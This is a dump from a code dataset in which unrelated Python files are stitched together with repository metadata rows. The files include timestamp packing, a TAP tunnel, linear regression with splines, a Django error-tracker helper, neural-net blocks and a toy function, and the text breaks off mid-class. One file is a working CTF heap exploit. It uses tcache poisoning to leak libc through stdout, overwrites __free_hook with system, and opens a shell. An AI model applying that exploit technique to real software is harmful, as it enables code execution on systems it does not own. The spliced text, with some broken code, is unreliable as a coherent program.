ccsds_days=convert_unix_days_to_ccsds_days(unix_days=unix_days),
ms_of_day=ms_of_day,
)
@classmethod
def __empty(cls):
return cls(ccsds_days=0, ms_of_day=0)
def pack(self) -> bytearray:
cds_packet = bytearray()
cds_packet.append(self.p_field)
cds_packet.append((self.ccsds_days & 0xFF00) >> 8)
cds_packet.append(self.ccsds_days & 0xFF)
cds_packet.append((self.ms_of_day & 0xFF000000) >> 24)
cds_packet.append((self.ms_of_day & 0x00FF0000) >> 16)
cds_packet.append((self.ms_of_day & 0x0000FF00) >> 8)
cds_packet.append(self.ms_of_day & 0x000000FF)
return cds_packet
@classmethod
def unpack(cls, time_field: bytes) -> CdsShortTimestamp:
if len(time_field) < cls.TIMESTAMP_SIZE:
raise ValueError
# TODO: check ID?
p_field = time_field[0]
ccsds_days = (time_field[1] << 8) | (time_field[2])
ms_of_day = (
(time_field[3] << 24)
| (time_field[4] << 16)
| (time_field[5]) << 8
| time_field[6]
)
return cls(ccsds_days=ccsds_days, ms_of_day=ms_of_day)
@staticmethod
def init_from_current_time() -> CdsShortTimestamp:
"""Returns a seven byte CDS short timestamp with the current time"""
unix_days = (datetime.datetime.utcnow() - UNIX_EPOCH).days
seconds = time.time()
fraction_ms = seconds - math.floor(seconds)
days_ms = int((seconds % SECONDS_PER_DAY) * 1000 + fraction_ms)
time_packet = CdsShortTimestamp.init_from_unix_days(
unix_days=unix_days, ms_of_day=days_ms
)
return time_packet
@abstractmethod
def return_unix_seconds(self) -> int:
return self.unix_seconds
@abstractmethod
def return_time_string(self) -> str:
return self.time_string
| 2,246 | 256 | 230 |
3687df8a06dbbc60ca02c86d1b38890d4f87ef48 | 2,230 | py | Python | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 22 | 2019-08-11T03:59:27.000Z | 2022-02-21T10:03:45.000Z | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 1 | 2021-06-02T02:21:42.000Z | 2021-06-02T02:21:42.000Z | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 7 | 2020-01-09T22:46:15.000Z | 2021-08-03T09:56:47.000Z | # File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc
from pwn_debug import *
pdbg=pwn_debug("./three")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
if __name__ == '__main__':
pwn()
| 20.272727 | 81 | 0.603139 | # File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc
from pwn_debug import *
pdbg=pwn_debug("./three")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(content):
p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("ontent:")
p.send(content)
def edit(idx,content):
p.recvuntil("choice:")
p.sendline("2")
p.recvuntil(" idx:")
p.sendline(str(idx))
p.recvuntil("content:")
p.send(content)
def delete(idx,choice='n'):
p.recvuntil("choice:")
p.sendline("3")
p.recvuntil(" idx:")
p.sendline(str(idx))
p.recvuntil("(y/n):")
p.sendline(choice)
def pwn():
#pdbg.bp()
add('0')
add((p64(0x0)+p64(0x11))*4)
#delete(0)
delete(1,'y')
delete(0)
delete(0)
delete(0)
edit(0,p8(0x50))
add('1')
# overlap chunk in 2 and 0
add(p64(0)+p64(0x91)) #2
for i in range(0,7):
delete(1)
#pdbg.bp([0xd02,0xb87])
## brute force stdout to leak
edit(2,p64(0)+p64(0x51))
delete(0,'y')
edit(2,p64(0)+p64(0x91))
delete(1,'y')
stdout_addr=membp.libc_base+libc.symbols['_IO_2_1_stdout_']
write_ptr=stdout_addr+0x28
edit(2,p64(0)+p64(0x51)+p16(write_ptr&0xffff))
#pdbg.bp(0xb87)
add('0')
add(p8(0xf0)) #1
p.recv(5)
leak_addr=u64(p.recv(8))
libc_base=leak_addr-libc.symbols['_IO_stdfile_1_lock']
free_hook=libc_base+libc.symbols['__free_hook']
system_addr=libc_base+libc.symbols['system']
log.info("leak libc base: %s"%(hex(libc_base)))
#pdbg.bp([0xd02,0xb87])
delete(0,'y')
edit(2,'/bin/sh\x00'+p64(0x41)+p64(free_hook))
#pdbg.bp([0xd02,0xb87])
add('0')
delete(0,'y')
add(p64(system_addr))
# trigger free
p.recvuntil("choice:")
p.sendline("3")
p.recvuntil(" idx:")
p.sendline('2')
p.interactive()
if __name__ == '__main__':
pwn()
| 1,602 | 0 | 93 |
fdd6211d40a4db2191c7e6a20b642e398c9bb609 | 1,012 | py | Python | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
import eventlet
import pytun
import os
import sys
eventlet.monkey_patch(all=True)
tap = pytun.open('tap')
os.system("ip link set %s up" % tap.name)
os.system("ip link set dev %s mtu 520" % tap.name)
os.system("ip addr add 192.167.100.1/24 dev %s" % tap.name)
eventlet.spawn_n(handletap)
server = eventlet.listen(('0.0.0.0', 25702))
while True:
try:
new_sock, address = server.accept()
eventlet.spawn_n(handlenet, new_sock)
except (SystemExit, KeyboardInterrupt):
tap.close()
break
| 21.531915 | 60 | 0.572134 | #!/usr/bin/env python
# encoding: utf-8
import eventlet
import pytun
import os
import sys
eventlet.monkey_patch(all=True)
tap = pytun.open('tap')
os.system("ip link set %s up" % tap.name)
os.system("ip link set dev %s mtu 520" % tap.name)
os.system("ip addr add 192.167.100.1/24 dev %s" % tap.name)
def handlenet(sock):
while True:
try:
x = sock.recv(520)
tap.send(x)
except Exception,e:
print(e)
break
def handletap():
net = None
while True:
msg = tap.recv()
try:
if not net:
net = eventlet.connect((sys.argv[1], 25702))
net.sendall(msg)
except Exception,e:
print(e)
net = None
eventlet.spawn_n(handletap)
server = eventlet.listen(('0.0.0.0', 25702))
while True:
try:
new_sock, address = server.accept()
eventlet.spawn_n(handlenet, new_sock)
except (SystemExit, KeyboardInterrupt):
tap.close()
break
| 400 | 0 | 46 |
0824ffdb3dca3335c54914c58b1c02f0f527cd9b | 15,464 | py | Python | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | import sys;
import abc;
import math;
import multiprocessing;
import psutil;
import numpy as np;
from scipy.stats import t, f;
import DataHelper;
'''
d
f(x) = Σ βj * x^d
j=0
degree of freedom = d + 1
'''
'''
K
f(x) = β0 + Σβk * I(Ck < x <= Ck+1)
k=1
degree of freedom = K + 1
'''
'''
M-1 K
f(x) = Σ βj * x^(j-1) + Σ θk * (x-ξk)+^(M-1)
j=0 k=1
f, f', f'', ... d^(M-2)f is continuous at ξk, k = 1, 2, ..., K
degree of freedom = K + M
the default is cubic spline with M = 4.
'''
'''
K-2
f = β0 + β1x + Σ θj * (ξK - ξj) * [d(j, x) - d(K-1, x)]
j=1
d(j, x) = [(x - ξj)+^3 - (x - ξK)+^3] / (ξK - ξj)
f''(x) = 0, when x ∈ (-∞, ξ1] ∪ [ξK, ∞)
degree of freedom = K
when K = 1 and 2, f(x) = β0 + β1x.
'''
| 29.455238 | 228 | 0.548564 | import sys;
import abc;
import math;
import multiprocessing;
import psutil;
import numpy as np;
from scipy.stats import t, f;
import DataHelper;
class LinearRegression:
__DEFAULT_SIG_LEVEL = 0.05;
@staticmethod
def calcVIF(X):
if X is None:
raise ValueError("matrix X is None");
return [1 / (1 - LinearRegression().fit(np.delete(X, i, 1), X[:, i]).r2) for i in range(0, X.shape[1])];
@staticmethod
def _optimalSubsetsCore(X, y, indices):
return indices, LinearRegression().fit(X[:, indices], y);
@staticmethod
def optimalSubsets(X, y, m = None):
if X is None or y is None:
raise ValueError("matrix X or vector y is None");
result = [];
p = X.shape[1];
if m is not None and (m < 1 or m > p):
raise ValueError("m must be between 1 and column numbers of X");
# number of models when m is null: 2^p
if p <= 14 or m is not None:
result.extend([min([LinearRegression._optimalSubsetsCore(X, y, indices) for indices in DataHelper.combinations(p, k)], key = lambda item: item[1].rss) for k in (range(1, p + 1) if m is None else range(m, m + 1))]);
else:
data, models = [], None;
for k in range(1, p + 1):
data.extend([(X, y, indices) for indices in DataHelper.combinations(p, k)]);
data = list(map(tuple, np.array(data, np.object)[DataHelper.randomArrangement(len(data)), :].tolist()));
with multiprocessing.Pool(max(1, psutil.cpu_count(False) - 2)) as pool:
models = pool.starmap(LinearRegression._optimalSubsetsCore, data);
for k in range(1, p + 1):
result.append(min([item for item in models if len(item[0]) == k], key = lambda item: item[1].rss));
# result item format: (indices, model)
return result;
@staticmethod
def forwardSelection(X, y):
if X is None or y is None:
raise ValueError("matrix X or vector y is None");
result = [];
p = X.shape[1];
current, leftover = [], list(range(0, p));
# number of models: p * (p + 1) / 2
for k in range(1, p + 1):
result.append(min([(current + [i], LinearRegression().fit(X[:, current + [i]], y)) for i in leftover], key = lambda item: item[1].rss));
current = result[len(result) - 1][0];
leftover.remove(current[len(current) - 1]);
# result item format: (indices, model)
return result;
@staticmethod
def backwardSelection(X, y):
if X is None or y is None:
raise ValueError("matrix X and vector y is None");
result = [];
p = X.shape[1];
leftover = set(range(0, p));
# number of models: p * (p + 1) / 2
result.append((list(leftover), LinearRegression().fit(X, y)));
for k in range(2, p + 1):
result.append(min([(list(leftover - {i}), LinearRegression().fit(X[:, list(leftover - {i})], y)) for i in leftover], key = lambda item: item[1].rss));
leftover = set(result[len(result) - 1][0]);
# result item format: (indices, model)
return result;
@staticmethod
def crossValidation(X, y, k):
if X is None or y is None:
raise ValueError("matrix X and vector y is None");
mse = np.mat([list(map(lambda item: item[1].calcMse(testX[:, item[0]], testY), LinearRegression.optimalSubsets(trainX, trainY))) for trainX, trainY, testX, testY in DataHelper.foldOutSampling(X, y, k)]);
return LinearRegression.optimalSubsets(X, y, np.argmin(mse.mean(0).A.flatten()) + 1)[0];
def __init__(self):
self.__basisFunctions = None;
self.__n = None;
self.__p = None;
self.__beta = None;
self.__sigma = None;
self.__residual = None;
self.__rss = None;
self.__r2 = None;
self.__cp = None;
self.__aic = None;
self.__bic = None;
self.__adjustedR2 = None;
self.__c = None;
self.__allF = None;
self.__allP = None;
self.__betaStd = None;
self.__betaT = None;
self.__betaP = None;
self.__betaValue = None;
self.__sigLevel = None;
def __repr__(self):
return "y = {0}{1}".format(
self.__beta[0, 0],
"".join([" {0} {1} * x{2:.0f}".format("+" if item[0] >= 0 else "-", math.fabs(item[0]), item[1])
for item in
np.hstack((self.__betaValue, np.mat(range(1, self.__p)).T)).tolist()])
);
def __str__(self):
return "y = β0{0}\r\n{1}\r\n{2}".format(
"".join(
[" + β{0:.0f} * x{0:.0f}".format(item) for item in list(range(1, self.__p))]),
"\r\n".join(
["β{0:.0f} = {1}, std = {2}, t-value = {3}, p-value = {4}".format(*item)
for item in
np.hstack((np.mat(range(0, self.__p)).T, self.__beta, self.__betaStd, self.__betaT, self.__betaP)).tolist()]),
"σ = {0}, R^2 = {1}, Cp = {2}, AIC = {3}, BIC = {4}, adjusted R^2 = {5}, F-value = {6}, F p-value = {7}".format(self.__sigma, self.__r2, self.__cp, self.__aic, self.__bic, self.__adjustedR2, self.__allF, self.__allP)
);
@property
def beta(self):
return self.__betaValue;
@property
def betaP(self):
return self.__betaP;
@property
def sigma(self):
return self.__sigma;
@property
def residual(self):
return self.__residual;
@property
def rss(self):
return self.__rss;
@property
def rssDf(self):
return self.__n - self.__p;
@property
def mse(self):
return self.__rss / self.__n;
@property
def r2(self):
return self.__r2;
@property
def cp(self):
return self.__cp;
@property
def aic(self):
return self.__aic;
@property
def bic(self):
return self.__bic;
@property
def adjustedR2(self):
return self.__adjustedR2;
@property
def sigLevel(self):
return self.__sigLevel;
@sigLevel.setter
def sigLevel(self, value):
if self.__betaP is None or self.__allP is None:
return;
if value is None:
value = LinearRegression.__DEFAULT_SIG_LEVEL;
self.__sigLevel = value;
self.__betaValue[(self.__betaP >= value).A.flatten(), :] = 0;
if self.__allP >= value:
self.__betaValue[:, :] = 0;
def __getX(self, X):
dataSet = X;
if self.__basisFunctions is not None and any(self.__basisFunctions):
sets = tuple([item for item in [self.__basisFunctions[j].getX(X[:, j]) if self.__basisFunctions[j] is not None else X[:, j] for j in range(X.shape[1])] if item is not None]);
if len(sets) > 0:
dataSet = np.hstack(sets);
else:
dataSet = np.mat(np.empty((X.shape[0], 0)));
return np.hstack((np.mat(np.ones((dataSet.shape[0], 1))), dataSet));
def __getP(self, value, degree):
if isinstance(value, np.matrix):
return np.mat(2 * (1 - t.cdf(np.abs(value.A.flatten()), degree))).T;
else:
return 2 * (1 - t.cdf(math.fabs(value), degree));
def __predict(self, X):
return X * self.__betaValue;
def fit(self, X, y, baseFunctions = None, w = None):
# w is the weight vector
if X is None or y is None:
raise ValueError("matrix X or vector y is None");
if baseFunctions is not None and len(baseFunctions) != X.shape[1]:
raise ValueError("the length of base functions must be equals to column numbers of X");
if w is not None and w.shape[0] != X.shape[0]:
raise ValueError("the length of weight vector must be equals to row numbers of X");
self.__basisFunctions = baseFunctions;
X = self.__getX(X);
n, p = X.shape;
W = np.diag(w) if w is not None else np.identity(n);
A = X.T * W * X;
if np.linalg.matrix_rank(A, tol = 1e-8) == A.shape[0]:
C = A.I;
else:
C = np.linalg.pinv(A);
self.__n = n;
self.__p = p;
self.__beta = C * X.T * W * y;
centralizedY = y - y.mean();
residual = y - X * self.__beta;
rss = (residual.T * residual)[0, 0];
tss = (centralizedY.T * centralizedY)[0, 0];
sigma2 = rss / (n - p);
self.__sigma = math.sqrt(sigma2);
self.__residual = residual;
self.__rss = rss;
self.__r2 = 1 - rss / tss if tss != 0 else 0;
self.__cp = (rss + 2 * (p - 1) * sigma2) / n;
# self.__aic = (rss + 2 * (p - 1) * sigma2) / (n * sigma2) + math.log(2 * math.pi * sigma2);
# self.__bic = (rss + math.log(n) * (p - 1) * sigma2) / (n * sigma2) + math.log(2 * math.pi * sigma2);
self.__aic = 2 * (p - 1) + n - p + n * math.log(2 * math.pi * sigma2) if sigma2 > 0 else -sys.maxsize;
self.__bic = math.log(n) * (p - 1) + n - p + n * math.log(2 * math.pi * sigma2) if sigma2 > 0 else -sys.maxsize;
self.__adjustedR2 = 1 - (rss / (n - p)) / (tss / (n - 1)) if tss != 0 else 0;
self.__c = C;
self.__betaStd = self.__sigma * np.sqrt(C.diagonal().T);
self.__betaT = np.divide(self.__beta, self.__betaStd) if self.__sigma != 0 else np.ones_like(self.__beta) * sys.maxsize;
self.__betaP = self.__getP(self.__betaT, n - p);
self.__betaValue = self.__beta.copy();
self.__allF = ((tss - rss) / (p - 1) / sigma2 if sigma2 != 0 else sys.maxsize) if p > 1 else 0;
self.__allP = 1 - f.cdf(self.__allF, p - 1, n - p) if p > 1 else 1;
return self;
def predictValue(self, X):
if X is None:
raise ValueError("matrix X is None");
return self.__predict(self.__getX(X));
def predictInterval(self, X, confidence = None, prediction = True):
if X is None:
raise ValueError("matrix X is None");
if confidence is not None and (confidence <= 0 or confidence >= 1):
raise ValueError("the confidence must be between 0 and 1");
X = self.__getX(X);
alpha = 1 - confidence if confidence is not None else LinearRegression.__DEFAULT_SIG_LEVEL;
tValue = t.ppf(1 - alpha / 2, self.__n - self.__p);
interval = np.sqrt((1 if prediction else 0) + np.multiply(X * self.__c, X).sum(1)) * self.__sigma * tValue;
value = self.__predict(X);
return np.mat(np.hstack((value - interval, value, value + interval)));
def calcRss(self, X, y):
if X is None or y is None:
raise ValueError("matrix X or vector y is None");
residual = y - self.predictValue(X);
return (residual.T * residual)[0, 0];
def calcMse(self, X, y):
if X is None or y is None:
raise ValueError("matrix X or vector y is None");
return self.calcRss(X, y) / X.shape[0];
class IBasisFunction(metaclass = abc.ABCMeta):
@property
@abc.abstractmethod
def df(self):
pass;
@abc.abstractmethod
def getX(self, x):
pass;
'''
d
f(x) = Σ βj * x^d
j=0
degree of freedom = d + 1
'''
class PolynomialFunction(IBasisFunction):
# df excludes intercept
def __init__(self, df):
if df < 0:
raise ValueError("df is at least 0");
self.__d = df;
@property
def df(self):
return self.__d;
def getX(self, x):
if x is None:
raise ValueError("vector x is None");
return DataHelper.vectorPoly(x, self.__d) if self.__d > 0 else None;
class KnottedFunction(IBasisFunction, metaclass = abc.ABCMeta):
def __init__(self, k = None, knots = None):
if k is None and knots is None:
raise ValueError("at least one of k and knots cannot be None");
if k is not None and k < 0:
raise ValueError("k is at least 0");
if knots is not None and not isinstance(knots, list):
raise ValueError("knots must be a list");
if knots is not None:
self._K = len(knots);
self._knots = knots;
else:
self._K = k;
self._knots = None;
@property
def knots(self):
return self._knots;
def _findKnots(self, x):
self._knots = [np.quantile(x, k / (self._K + 1), 0)[0] for k in range(1, self._K + 1)] if self._K > 0 else [];
@abc.abstractmethod
def _getX(self, x):
pass;
def getX(self, x):
if x is None:
raise ValueError("vector x is None");
if self._knots is None:
self._findKnots(x);
return self._getX(x);
'''
K
f(x) = β0 + Σβk * I(Ck < x <= Ck+1)
k=1
degree of freedom = K + 1
'''
class StepFunction(KnottedFunction):
# df excludes intercept
def __init__(self, df = None, knots = None):
if df is not None and df < 0:
raise Value("df is at least 0");
super().__init__(df, knots);
@property
def df(self):
return self._K;
def _getX(self, x):
return np.hstack(tuple([(np.logical_and(x > self._knots[i], x <= self._knots[i + 1]) if i < len(self._knots) - 1 else x > self._knots[i]) - 0 for i in range(0, self._K)])) if self._K > 0 else None;
'''
M-1 K
f(x) = Σ βj * x^(j-1) + Σ θk * (x-ξk)+^(M-1)
j=0 k=1
f, f', f'', ... d^(M-2)f is continuous at ξk, k = 1, 2, ..., K
degree of freedom = K + M
the default is cubic spline with M = 4.
'''
class RegressionSplineFunction(KnottedFunction):
# df excludes intercept
def __init__(self, df = None, m = 4, knots = None):
if m < 1:
raise ValueError("m is at least 1");
super().__init__(max(df + 1 - m, 0) if df is not None else None, knots);
self.__d = m - 1;
@property
def df(self):
return self._K + self.__d;
def _getX(self, x):
if self._K > 0:
Y = np.hstack(tuple([DataHelper.truncatedPower(x, self._knots[k], self.__d) for k in range(0, self._K)]));
return np.hstack((DataHelper.vectorPoly(x, self.__d), Y)) if self.__d > 0 else Y;
else:
return DataHelper.vectorPoly(x, self.__d) if self.__d > 0 else None;
'''
K-2
f = β0 + β1x + Σ θj * (ξK - ξj) * [d(j, x) - d(K-1, x)]
j=1
d(j, x) = [(x - ξj)+^3 - (x - ξK)+^3] / (ξK - ξj)
f''(x) = 0, when x ∈ (-∞, ξ1] ∪ [ξK, ∞)
degree of freedom = K
when K = 1 and 2, f(x) = β0 + β1x.
'''
class NatureCubicSplineFunction(KnottedFunction):
# df excludes intercept
def __init__(self, df = None, knots = None):
super().__init__(max(df + 1, 0) if df is not None else None, knots);
@property
def df(self):
return self._K - 1;
def __d(self, k, x):
return (DataHelper.truncatedPower(x, self._knots[k], 3) - DataHelper.truncatedPower(x, self._knots[self._K - 1], 3)) / (self._knots[self._K - 1] - self._knots[k]);
def _getX(self, x):
if self._K > 2:
dK_1 = self.__d(self._K - 2, x);
return np.hstack(tuple([x] + [(self._knots[self._K - 1] - self.knots[k]) * (self.__d(k, x) - dK_1) for k in range(0, self._K - 2)]));
else:
return x;
| 12,306 | 2,186 | 161 |
0d6c94634144c4ffc67edce361e3600a5bfddde3 | 2,741 | py | Python | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 16 | 2019-12-17T10:57:43.000Z | 2022-01-30T13:03:53.000Z | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 15 | 2020-01-08T12:08:32.000Z | 2022-01-28T13:16:48.000Z | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 8 | 2020-01-08T14:10:14.000Z | 2021-01-31T22:26:07.000Z | # -*- coding: utf-8 -*-
#
# Django components
#
# :copyright: 2020 Sonu Kumar
# :license: BSD-3-Clause
#
from .utils import DefaultDjangoContextBuilder, DjangoNotification, DefaultDjangoViewPermission
from .settings import *
from .utils import DjangoNotification, DefaultDjangoContextBuilder
from error_tracker.libs.utils import Masking, get_class_from_path, get_class_instance
from error_tracker import ModelMixin, MaskingMixin, TicketingMixin, NotificationMixin, ContextBuilderMixin, \
ViewPermissionMixin
from django.apps import apps as django_apps
import warnings
def get_exception_model():
"""
Return the APP error model that is active in this project.
"""
from .models import ErrorModel
model_path = APP_ERROR_DB_MODEL
if model_path is None:
warnings.warn("APP_ERROR_DB_MODEL is not set using default model")
return ErrorModel
try:
return django_apps.get_model(model_path, require_ready=False)
except ValueError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn("APP_ERROR_DB_MODEL must be of the form 'app_label.model_name'")
except LookupError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn(
"APP_ERROR_DB_MODEL refers to model '%s' that has not been installed" % model_path
)
raise LookupError("APP_ERROR_DB_MODEL is set to '%s' but it's not importable" % model_path)
| 38.069444 | 110 | 0.708501 | # -*- coding: utf-8 -*-
#
# Django components
#
# :copyright: 2020 Sonu Kumar
# :license: BSD-3-Clause
#
from .utils import DefaultDjangoContextBuilder, DjangoNotification, DefaultDjangoViewPermission
from .settings import *
from .utils import DjangoNotification, DefaultDjangoContextBuilder
from error_tracker.libs.utils import Masking, get_class_from_path, get_class_instance
from error_tracker import ModelMixin, MaskingMixin, TicketingMixin, NotificationMixin, ContextBuilderMixin, \
ViewPermissionMixin
from django.apps import apps as django_apps
import warnings
def get_exception_model():
"""
Return the APP error model that is active in this project.
"""
from .models import ErrorModel
model_path = APP_ERROR_DB_MODEL
if model_path is None:
warnings.warn("APP_ERROR_DB_MODEL is not set using default model")
return ErrorModel
try:
return django_apps.get_model(model_path, require_ready=False)
except ValueError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn("APP_ERROR_DB_MODEL must be of the form 'app_label.model_name'")
except LookupError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn(
"APP_ERROR_DB_MODEL refers to model '%s' that has not been installed" % model_path
)
raise LookupError("APP_ERROR_DB_MODEL is set to '%s' but it's not importable" % model_path)
def get_masking_module():
return get_class_instance(APP_ERROR_MASKING_MODULE, MaskingMixin, Masking, 'Masking', APP_ERROR_MASK_WITH,
APP_ERROR_MASKED_KEY_HAS)
def get_ticketing_module():
return get_class_instance(APP_ERROR_TICKETING_MODULE, TicketingMixin, None, 'Ticketing')
def get_notification_module():
if APP_ERROR_RECIPIENT_EMAIL and APP_ERROR_EMAIL_SENDER:
return get_class_instance(APP_ERROR_NOTIFICATION_MODULE, NotificationMixin, DjangoNotification,
"Notification")
def get_context_builder():
return get_class_instance(APP_ERROR_CONTEXT_BUILDER_MODULE, ContextBuilderMixin,
DefaultDjangoContextBuilder, "ContextBuilder")
def get_view_permission():
return get_class_instance(APP_ERROR_VIEW_PERMISSION, ViewPermissionMixin, DefaultDjangoViewPermission,
"ViewPermission")
| 821 | 0 | 115 |
5dfad7fcfd22e1a7e1c32b2b0aa444c8a72724e9 | 258 | py | Python | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ene-Jun-2019/Luis Ornelas/Practica 1/8-12_Sandwiches.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z |
sandwich('Jamon','Queso','Lechuga','Toamte')
sandwich('Queso','Mantequilla')
sandwich('Tocino','Carne','Salsa BBQ') | 32.25 | 44 | 0.689922 | def sandwich(*ingredientes):
print("\nIngredientes del Sandwich:")
for ingrediente in ingredientes:
print("- " + ingrediente)
sandwich('Jamon','Queso','Lechuga','Toamte')
sandwich('Queso','Mantequilla')
sandwich('Tocino','Carne','Salsa BBQ') | 120 | 0 | 22 |
95de623b7ea65f9318deca27a11c31f4f6e0b8a5 | 5,237 | py | Python | physiossl/backbone/convnet.py | larryshaw0079/PhysioLearn | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | 2 | 2021-12-11T15:17:47.000Z | 2021-12-27T07:39:31.000Z | physiossl/backbone/convnet.py | larryshaw0079/PhysioSSL | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | null | null | null | physiossl/backbone/convnet.py | larryshaw0079/PhysioSSL | 6438924a1b2a0c2ce4c238f504654f9a7f993d9e | [
"MIT"
] | null | null | null | """
@Time : 2021/6/23 17:08
@File : convnet.py
@Software: PyCharm
@Desc :
"""
from typing import Union, List
import torch.nn as nn
class ResidualBlock1D(nn.Module):
"""
The basic block of the 1d residual convolutional network
"""
def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
"""
Args:
in_channel ():
out_channel ():
kernel_size ():
stride ():
"""
super(ResidualBlock1D, self).__init__()
# assert kernel_size % 2 == 1
self.layers = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size, stride=stride, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=True),
nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size, stride=1, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel)
)
self.downsample = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm1d(out_channel)
)
self.relu = nn.ReLU(inplace=True)
def resnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(ResidualBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
def convnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(BasicConvBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
| 29.587571 | 120 | 0.573038 | """
@Time : 2021/6/23 17:08
@File : convnet.py
@Software: PyCharm
@Desc :
"""
from typing import Union, List
import torch.nn as nn
class ResidualBlock1D(nn.Module):
"""
The basic block of the 1d residual convolutional network
"""
def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
"""
Args:
in_channel ():
out_channel ():
kernel_size ():
stride ():
"""
super(ResidualBlock1D, self).__init__()
# assert kernel_size % 2 == 1
self.layers = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size, stride=stride, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=True),
nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size, stride=1, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel)
)
self.downsample = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm1d(out_channel)
)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
out = self.layers(x)
identity = self.downsample(x)
out += identity
return self.relu(out)
class BasicConvBlock1D(nn.Module):
def __init__(self, in_channel, out_channel, kernel_size=7, stride=1):
"""
Args:
in_channel ():
out_channel ():
kernel_size ():
stride ():
"""
super(BasicConvBlock1D, self).__init__()
self.layers = nn.Sequential(
nn.Conv1d(in_channel, out_channel, kernel_size=kernel_size, stride=stride, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=True),
